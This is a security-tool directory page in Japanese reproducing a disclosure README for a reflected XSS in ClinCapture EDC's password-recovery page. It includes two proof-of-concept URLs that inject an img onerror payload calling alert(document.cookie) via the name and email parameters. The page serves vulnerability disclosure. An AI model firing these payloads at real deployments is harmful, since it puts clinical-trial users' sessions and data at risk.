Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-65270 — ClinCapture EDCにおける反射型XSS | Kitploit
ツール/GitHubGitHub/xh4vm/cve-2025-65270
脆弱性分析ウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubxh4vm/cve-2025-65270

CVE-2025-65270

ClinCapture EDCにおける反射型XSS

リポジトリを見る
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-65270

⚠️ 免責事項

このリポジトリは教育および防御的なセキュリティ研究のみを目的としています。

🔥 概要

ClinCapture EDC 3.0 および 2.2.3 における反射型クロスサイトスクリプティング (XSS) の脆弱性により、認証されていないリモート攻撃者が被害者のブラウザのコンテキストで JavaScript コードを実行できる可能性があります。

poc_xss

🧪 概念実証

脆弱性を実証するには、パスワード回復タブに移動し、name または email パラメータにペイロードを指定するか、または 1 つのリクエストを送信します。

🔓 name パラメータを介して

root@kitploit:~
<url>/edc/RequestPassword?action=submit&name=text%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&[email protected]&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

poc_xss_1

🔓 email パラメータを介して

root@kitploit:~
<url>/edc/RequestPassword?action=submit&name=text&[email protected]%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

poc_xss_2

🚨 影響

認証されていないユーザーは、被害者のブラウザのコンテキストで JavaScript コードを実行でき、被害者に代わってアクションを実行したり、セキュリティ質問の回答などの機密情報を盗むことを目的としています。

🔗 参考文献

  • CVE-2025-65270
ツールをダウンロード